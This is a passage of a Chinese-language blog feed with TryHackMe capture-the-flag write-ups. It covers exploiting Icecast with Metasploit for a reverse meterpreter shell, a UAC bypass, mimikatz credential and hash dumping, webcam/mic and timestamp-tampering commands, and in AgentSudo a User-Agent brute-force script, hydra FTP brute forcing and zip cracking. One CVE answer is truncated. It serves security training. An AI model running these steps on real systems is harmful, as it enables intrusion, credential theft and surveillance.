&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_clock-skew: mean: 1h15m00s, deviation: 2h30m00s, median: 0s
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_nbstat: NetBIOS name: DARK-PC, NetBIOS user: , NetBIOS MAC: 02:bd:72:1c:16:7b (unknown)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| smb-os-discovery:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| Computer name: Dark-PC
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| NetBIOS computer name: DARK-PC\x00
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| Workgroup: WORKGROUP\x00
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_ System time: 2021-07-31T08:02:13-05:00
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| smb-security-mode:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| account_used: guest
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| authentication_level: user
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| challenge_response: supported
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_ message_signing: disabled (dangerous, but default)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| smb2-security-mode:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| 2.02:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_ Message signing enabled but not required
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| smb2-time:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| date: 2021-07-31T13:02:13
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_ start_date: 2021-07-31T12:49:56
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;TRACEROUTE (using port 110/tcp)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;HOP RTT ADDRESS
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;1 139.52 ms 10.13.0.1
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;2 ... 3
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;4 283.86 ms 10.10.209.59
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Nmap done: 1 IP address (1 host up) scanned in 104.04 seconds
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;Once the scan completes, we&amp;rsquo;ll see a number of interesting ports open on this machine. As you might have guessed, the firewall has been disabled (with the service completely shutdown), leaving very little to protect this machine. One of the more interesting ports that is open is Microsoft Remote Desktop (MSRDP). What port is this open on?一堆字，題目不會講重點ㄇ…他問 RDP 是什麼 Port&lt;/li&gt;
&lt;li&gt;&lt;code&gt;3389&lt;/code&gt;What service did nmap identify as running on port 8000? (First word of this service)- 用 &lt;code&gt;-A&lt;/code&gt; 的 nmap 可以看出&lt;/li&gt;
&lt;li&gt;他是 &lt;code&gt;Icecast&lt;/code&gt;What does Nmap identify as the hostname of the machine? (All caps for the answer)- 一樣是 &lt;code&gt;-A&lt;/code&gt; 的 nmap 有寫到 &lt;code&gt;Host:&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;DARK-PC&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="gain-access"&gt;Gain Access&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Now that we&amp;rsquo;ve identified some interesting services running on our target machine, let&amp;rsquo;s do a little bit of research into one of the weirder services identified: Icecast. Icecast, or well at least this version running on our target, is heavily flawed and has a high level vulnerability with a score of 7.5 (7.4 depending on where you view it). What type of vulnerability is it? Use &lt;a href="https://www.cvedetails.com"&gt;https://www.cvedetails.com&lt;/a&gt; for this question and the next.我們知道他是 &lt;code&gt;Icecast&lt;/code&gt; 就可以找到他的弱點&lt;/li&gt;
&lt;li&gt;不過我是直接 Google &lt;code&gt;Icecast RCE&lt;/code&gt;&lt;del&gt;我覺得 cvedetails 的搜尋很難用&lt;/del&gt;&lt;a href="https://www.cvedetails.com/cve/CVE-2004-1561/"&gt;https://www.cvedetails.com/cve/CVE-2004-1561/&lt;/a&gt;題目問說 Type- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/1c452-SmZtXs1.png"&gt;所以是 &lt;code&gt;Execute Code Overflow&lt;/code&gt;What is the CVE number for this vulnerability? This will be in the format: CVE-0000-0000- &lt;code&gt;CVE-2004-156&lt;/code&gt;After Metasploit has started, let&amp;rsquo;s search for our target exploit using the command &amp;lsquo;search icecast&amp;rsquo;. What is the full path (starting with exploit) for the exploitation module? This module is also referenced in &amp;lsquo;RP: Metasploit&amp;rsquo; which is recommended to be completed prior to this room, although not entirely necessary.- 開啟 msf&lt;code&gt;msfconsole&lt;/code&gt;輸入 &lt;code&gt;search icecast&lt;/code&gt; 尋找 icecast 相關攻擊 module- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/5ed43-JahaOFV.png"&gt;可以找到 module 為- &lt;code&gt;exploit/windows/http/icecast_header&lt;/code&gt;準備 Exploit- 輸入 &lt;code&gt;use 0&lt;/code&gt; 或 &lt;code&gt;use exploit/windows/http/icecast_header&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;輸入 &lt;code&gt;show options&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/8b2ac-ebWMHSw.png"&gt;&lt;/li&gt;
&lt;li&gt;可以看到我們需要輸入的參數RHOSTS&lt;/li&gt;
&lt;li&gt;LHOST&lt;code&gt;set RHOSTS 10.10.209.59``set LHOSTS 10.13.21.55&lt;/code&gt;輸入 &lt;code&gt;exploit&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="escalate"&gt;Escalate&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Woohoo! We&amp;rsquo;ve gained a foothold into our victim machine! What&amp;rsquo;s the name of the shell we have now?&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/1f5a5-In1AKy0.png"&gt;&lt;/li&gt;
&lt;li&gt;他自動彈回了一個 &lt;code&gt;meterpreter&lt;/code&gt; 的 shellWhat user was running that Icecast process? The commands used in this question and the next few are taken directly from the &amp;lsquo;RP: Metasploit&amp;rsquo; room.- 輸入 &lt;code&gt;ps&lt;/code&gt; 可以看到所有的 process&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/c8d7e-d4jMJL3.png"&gt;&lt;/li&gt;
&lt;li&gt;而如上圖，&lt;code&gt;Icecast2.exe&lt;/code&gt; 使用者為 &lt;code&gt;DARK&lt;/code&gt;What build of Windows is the system?- 偵察系統版本有助於後續的工作&lt;/li&gt;
&lt;li&gt;可以輸入 &lt;code&gt;sysinfo&lt;/code&gt; 觀察&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/6f186-PIFkh0P.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;7601&lt;/code&gt;Now that we know some of the finer details of the system we are working with, let&amp;rsquo;s start escalating our privileges. First, what is the architecture of the process we&amp;rsquo;re running?- 如上的 &lt;code&gt;sysinfo&lt;/code&gt; ，可以看到架構是 &lt;code&gt;x64&lt;/code&gt;Now that we know the architecture of the process, let&amp;rsquo;s perform some further recon. While this doesn&amp;rsquo;t work the best on x64 machines, let&amp;rsquo;s now run the following command &lt;code&gt;run post/multi/recon/local_exploit_suggester&lt;/code&gt;. &lt;em&gt;This can appear to hang as it tests exploits and might take several minutes to complete&lt;/em&gt;- 接下來我們要使用 meterpreter 的自動 exploit 推薦器來做自動化測試&lt;/li&gt;
&lt;li&gt;&lt;code&gt;run post/multi/recon/local_exploit_suggester&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/da595-ROwgkuO.png"&gt;Running the local exploit suggester will return quite a few results for potential escalation exploits. What is the full path (starting with exploit/) for the first returned exploit?- 第一個回傳的是 &lt;code&gt;exploit/windows/local/bypassuac_eventvwr&lt;/code&gt;按下鍵盤 &lt;code&gt;ctrl + z&lt;/code&gt; 先把 meterpreter session 丟去背景- 準備來下 explit 指令&lt;/li&gt;
&lt;li&gt;輸入 &lt;code&gt;use exploit/windows/local/bypassuac_eventvwr&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/22afd-butocXi.png"&gt;輸入 &lt;code&gt;show options&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/c123b-8NpF3XG.png"&gt;確認目前的 session ID- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/da8db-yeRDm2Y.png"&gt;&lt;/li&gt;
&lt;li&gt;ID 為 &lt;code&gt;1&lt;/code&gt;設定相關參數- &lt;code&gt;set session 1&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;set LHOSTS 10.13.21.55&lt;/code&gt;輸入 &lt;code&gt;run&lt;/code&gt; 開始執行- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/4b87c-rCkmQoo.png"&gt;We can now verify that we have expanded permissions using the command &lt;code&gt;getprivs&lt;/code&gt;. What permission listed allows us to take ownership of files?- 輸入 &lt;code&gt;getprivs&lt;/code&gt; 可以看到我們的權限&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/71f40-xFxCjcl.png"&gt;&lt;/li&gt;
&lt;li&gt;他說要可以 take ownership of files&lt;/li&gt;
&lt;li&gt;所以是 &lt;code&gt;SeTakeOwnershipPrivilege&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="looting"&gt;Looting&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Mentioned within this question is the term &amp;rsquo;living in&amp;rsquo; a process. Often when we take over a running program we ultimately load another shared library into the program (a dll) which includes our malicious code. From this, we can spawn a new thread that hosts our shell.他說要找印表機相關的程式&lt;/li&gt;
&lt;li&gt;先下 &lt;code&gt;ps&lt;/code&gt; 觀察 processes&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/caa5e-yfRB3fr.png"&gt;透過 Google 可以發現是 &lt;code&gt;spoolsv.exe&lt;/code&gt;- 他的 pid 是 &lt;code&gt;1300&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/d8722-1X7x918.png"&gt;輸入 &lt;code&gt;getuid&lt;/code&gt; 觀察目前我們是什麼使用者- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/c1cfb-h7Qlwg7.png"&gt;輸入 migrate &lt;code&gt;1300&lt;/code&gt;- 把自己的 process 搬移到 pid &lt;code&gt;1300&lt;/code&gt; 上面&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/5c73d-xGFilxI.png"&gt;Let&amp;rsquo;s check what user we are now with the command &lt;code&gt;getuid&lt;/code&gt;. What user is listed?- 再輸入一次 &lt;code&gt;getuid&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/7e213-n76S9D9.png"&gt;&lt;/li&gt;
&lt;li&gt;會發現我們變成 &lt;code&gt;NT AUTHORITY\SYSTEM&lt;/code&gt; 權限!輸入 &lt;code&gt;load kiwi&lt;/code&gt; 載入 mimikatz- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/4b386-PosfjpO.png"&gt;輸入 &lt;code&gt;help&lt;/code&gt; 觀察 &lt;code&gt;mimikatz&lt;/code&gt; 使用方法- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/1e5b4-oUDlEAd.png"&gt;Which command allows up to retrieve all credentials?- &lt;code&gt;creds_all&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/b6780-6hVvHWN.png"&gt;Run this command now. What is Dark&amp;rsquo;s password? Mimikatz allows us to steal this password out of memory even without the user &amp;lsquo;Dark&amp;rsquo; logged in as there is a scheduled task that runs the Icecast as the user &amp;lsquo;Dark&amp;rsquo;. It also helps that Windows Defender isn&amp;rsquo;t running on the box ;) (Take a look again at the ps list, this box isn&amp;rsquo;t in the best shape with both the firewall and defender disabled)- 上面就有寫到 &lt;code&gt;Dark&lt;/code&gt; 的密碼為 &lt;code&gt;Password01!&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="post-exploitation"&gt;Post-Exploitation&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;What command allows us to dump all of the password hashes stored on the system? We won&amp;rsquo;t crack the Administrative password in this case as it&amp;rsquo;s pretty strong (this is intentional to avoid password spraying attempts)輸入 &lt;code&gt;hashdump&lt;/code&gt; 可以 dump 出所有的密碼 hash&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/49caa-XUEXCuv.png"&gt;&lt;/li&gt;
&lt;li&gt;其實我們在這邊也可以複製 Dark 的 hash 然後用 John 爆爆看&lt;code&gt;john hash.txt --wordlist=/opt/rockyou.txt --format=NT&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/b2f74-CPtjE1t.png"&gt;&lt;/li&gt;
&lt;li&gt;可以發現也是可以快速爆出密碼While more useful when interacting with a machine being used, what command allows us to watch the remote user&amp;rsquo;s desktop in real time?- 這題剛開始我以為是說螢幕截圖 &lt;code&gt;screenshot&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/942e3-LFC3mFD.png"&gt;&lt;/li&gt;
&lt;li&gt;輸入完之後會自動的存一張即時的圖檔&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/6441e-V1k9CCb.png"&gt;不過後來發現他要是 &lt;code&gt;real time&lt;/code&gt;，所以答案是 &lt;code&gt;screenshare&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/79461-fHJDX5V.png"&gt;&lt;/li&gt;
&lt;li&gt;他會開一個 html 然後自動刷新、可以即時監看&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/efc6a-h18QsIa.png"&gt;How about if we wanted to record from a microphone attached to the system?- 監聽麥克風可以使用 &lt;code&gt;record_mic&lt;/code&gt;To complicate forensics efforts we can modify timestamps of files on the system. What command allows us to do this? Don&amp;rsquo;t ever do this on a pentest unless you&amp;rsquo;re explicitly allowed to do so! This is not beneficial to the defending team as they try to breakdown the events of the pentest after the fact.- 竄改 timestamp 可以用 &lt;code&gt;timestomp&lt;/code&gt;Mimikatz allows us to create what&amp;rsquo;s called a &lt;code&gt;golden ticket&lt;/code&gt;, allowing us to authenticate anywhere with ease. What command allows us to do this?- &lt;code&gt;golden_ticket_create&lt;/code&gt;可以透過 &lt;code&gt;run post/windows/manage/enable_rdp&lt;/code&gt; 開啟RDP&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>AgentSudo (Try Hack Me Writeup)</title><link>http://blog.stevenyu.tw/2021/07/31/agentsudo-try-hack-me-writeup/</link><pubDate>Sat, 31 Jul 2021 23:44:00 +0800</pubDate><guid>http://blog.stevenyu.tw/2021/07/31/agentsudo-try-hack-me-writeup/</guid><description>&lt;blockquote&gt;
&lt;/blockquote&gt;
&lt;p&gt;URL: &lt;a href="https://tryhackme.com/room/agentsudoctf"&gt;https://tryhackme.com/room/agentsudoctf&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;IP : 10.10.119.64&lt;/p&gt;
&lt;h2 id="recon"&gt;Recon&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;老梗 &lt;code&gt;nmap -A 10.10.119.64&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/50fe2-n3zFLNJ.png"&gt;&lt;/li&gt;
&lt;li&gt;發現有開FTP&lt;/li&gt;
&lt;li&gt;SSH&lt;/li&gt;
&lt;li&gt;HTTP嘗試進入 HTTP- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/b1886-V7uzsli.png"&gt;&lt;/li&gt;
&lt;li&gt;看到他說需要在 useragent 放 &lt;code&gt;Codename&lt;/code&gt; (機密代號)&lt;/li&gt;
&lt;li&gt;又說 Dear agent, 下面有說 &lt;code&gt;Agent R&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;所以基本上可以先猜測 Agent &lt;code&gt;A&lt;/code&gt; 到 &lt;code&gt;Z&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="爆猜機密代號"&gt;爆猜機密代號&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;瀏覽器沒有太方便，所以我們先把瀏覽器 request 轉 &lt;code&gt;curl&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/77004-gcmLsCg.png"&gt;&lt;/li&gt;
&lt;li&gt;對著 F12 的 Reuest 右鍵，&lt;code&gt;Copy as cURL&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;curl 'http://10.10.119.64/' -H 'User-Agent: meow' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Connection: keep-alive' -H 'Upgrade-Insecure-Requests: 1' -H 'Cache-Control: max-age=0, no-cache' -H 'Pragma: no-cache'&lt;/code&gt;curl 轉 Python request- 我使用這個網站 &lt;a href="https://curl.trillworks.com/"&gt;https://curl.trillworks.com/&lt;/a&gt;把 curl 貼上就可以自動轉 python 的 request 了接下來寫一段扣爆破&lt;code&gt;因為如果猜錯他會回傳的字都是一樣的，那就猜測輸入正確時，他回傳的東西會不一樣，所以最簡單的方法可以用字串長度來比對，輸入錯誤時長度是 218 運氣很好，C 就猜到ㄌ&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff79c6"&gt;import&lt;/span&gt; requests
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff79c6"&gt;for&lt;/span&gt; i &lt;span style="color:#ff79c6"&gt;in&lt;/span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#34;ABCDEFGHIJKLMNOPQRSTUVWXYZ&amp;#34;&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; headers &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;User-Agent&amp;#39;&lt;/span&gt;: i ,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;Accept&amp;#39;&lt;/span&gt;: &lt;span style="color:#f1fa8c"&gt;&amp;#39;text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;Accept-Language&amp;#39;&lt;/span&gt;: &lt;span style="color:#f1fa8c"&gt;&amp;#39;en-US,en;q=0.5&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;Connection&amp;#39;&lt;/span&gt;: &lt;span style="color:#f1fa8c"&gt;&amp;#39;keep-alive&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;Upgrade-Insecure-Requests&amp;#39;&lt;/span&gt;: &lt;span style="color:#f1fa8c"&gt;&amp;#39;1&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;Cache-Control&amp;#39;&lt;/span&gt;: &lt;span style="color:#f1fa8c"&gt;&amp;#39;max-age=0, no-cache&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;Pragma&amp;#39;&lt;/span&gt;: &lt;span style="color:#f1fa8c"&gt;&amp;#39;no-cache&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; response &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; requests&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;get(&lt;span style="color:#f1fa8c"&gt;&amp;#39;http://10.10.119.64/&amp;#39;&lt;/span&gt;, headers&lt;span style="color:#ff79c6"&gt;=&lt;/span&gt;headers)&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;text
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8be9fd;font-style:italic"&gt;print&lt;/span&gt;(i,&lt;span style="color:#8be9fd;font-style:italic"&gt;len&lt;/span&gt;(response))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;用 &lt;code&gt;User-Agent:C&lt;/code&gt; 發 request&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/63c85-w7mG4xG.png"&gt;在 Firefox 上使用右鍵， Edit and Resend&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/3cf94-3R51Syu.png"&gt;- 修改 &lt;code&gt;User-Agent&lt;/code&gt; 為 C 並送出可以發現他自動跳轉到這個網頁- http://10.10.119.64/agent_C_attention.php&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/8badd-xqNapEK.png"&gt;&lt;/li&gt;
&lt;li&gt;內文中發現了 Agent C 叫做 &lt;code&gt;chris&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;而且他的主管在嘴他說使用弱密碼&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="ftp"&gt;FTP&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;嘗試爆破 FTP因為 nmap 有掃到 ssh 跟 ftp，隨便取 ftp&lt;/li&gt;
&lt;li&gt;透過 Hydra + Rockyou 字典來爆&lt;code&gt;hydra -l chris -P /opt/rockyou.txt ftp://10.10.119.64&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/d024e-xlSxZOe.png"&gt;可以了解到帳號為 &lt;code&gt;chris&lt;/code&gt;密碼為 &lt;code&gt;crystal&lt;/code&gt;嘗試登入 FTP- &lt;code&gt;ftp 10.10.119.64&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/705be-CO99QUz.png"&gt;&lt;/li&gt;
&lt;li&gt;輸入 &lt;code&gt;ls&lt;/code&gt; 觀察 ftp 裡面的檔案&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/4b992-J8Qx4iA.png"&gt;輸入 &lt;code&gt;get 檔名&lt;/code&gt; 把檔案依序載下來&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/4d70f-xHrtO12.png"&gt;觀察 txt 檔案- &lt;code&gt;cat To_agentJ.txt&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/e630d-An6TWpm.png"&gt;&lt;/li&gt;
&lt;li&gt;他說兩張照片都是假ㄉ，裡面有藏東東&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="stego"&gt;Stego&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;起手式 strings&lt;code&gt;strings cutie.png&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/deec5-ykQ85yu.png"&gt;&lt;/li&gt;
&lt;li&gt;可以發現裡面藏了一點點的字，但是用奇怪的編碼或加密QQ透過 binwalk 觀察是否裡面有藏檔案- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/5791a-RJMynFJ.png"&gt;&lt;/li&gt;
&lt;li&gt;發現 png 後面塞了一個 zip透過 foremost 解出裡面的檔案- &lt;code&gt;foremost cutie.png&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/327da-kMUJoXd.png"&gt;&lt;/li&gt;
&lt;li&gt;會發現資料夾裡面有一包 zip&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/e6929-HUQX7Ov.png"&gt;解壓縮 zip- 用最直覺的 &lt;code&gt;unzip&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/95ee3-OoGnr1v.png"&gt;&lt;/li&gt;
&lt;li&gt;會發現噴錯&lt;/li&gt;
&lt;li&gt;跟據&lt;a href="https://askubuntu.com/questions/596761/error-while-unzipping-need-pk-compat-v5-1-can-do-v4-6"&gt;這篇&lt;/a&gt;的講法，可以用 7z 來解&lt;code&gt;7z x 00000067.zip&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/b486f-0tfoRZr.png"&gt;&lt;/li&gt;
&lt;li&gt;用 7z 解，會發現 zip 需要密碼爆破 zip 密碼- 先把 zip 轉成 約翰格式&lt;/li&gt;
&lt;li&gt;&lt;code&gt;zip2john 00000067.zip &amp;gt; j.txt&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;john j.txt --wordlist=/opt/rockyou.txt&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;就可以取得密碼為 &lt;code&gt;alien&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/25acd-VhdQ6ME.png"&gt;解壓縮 zip- &lt;code&gt;7z x 00000067.zip&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;並使用密碼 &lt;code&gt;alien&lt;/code&gt; 即可解壓完畢&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/7da20-ZzuI3lQ.png"&gt;&lt;/li&gt;
&lt;li&gt;解壓內容可以看到一組奇怪的密碼 &lt;code&gt;QXJlYTUx&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;透過 base64 解碼&lt;code&gt;base64 -d 即可獲得 &lt;/code&gt;Area51&lt;code&gt;接下來看到另外一個檔案- &lt;/code&gt;cute-alien.jpg`&lt;/li&gt;
&lt;li&gt;這邊使用 &lt;code&gt;steghide&lt;/code&gt; 進行解密&lt;/li&gt;
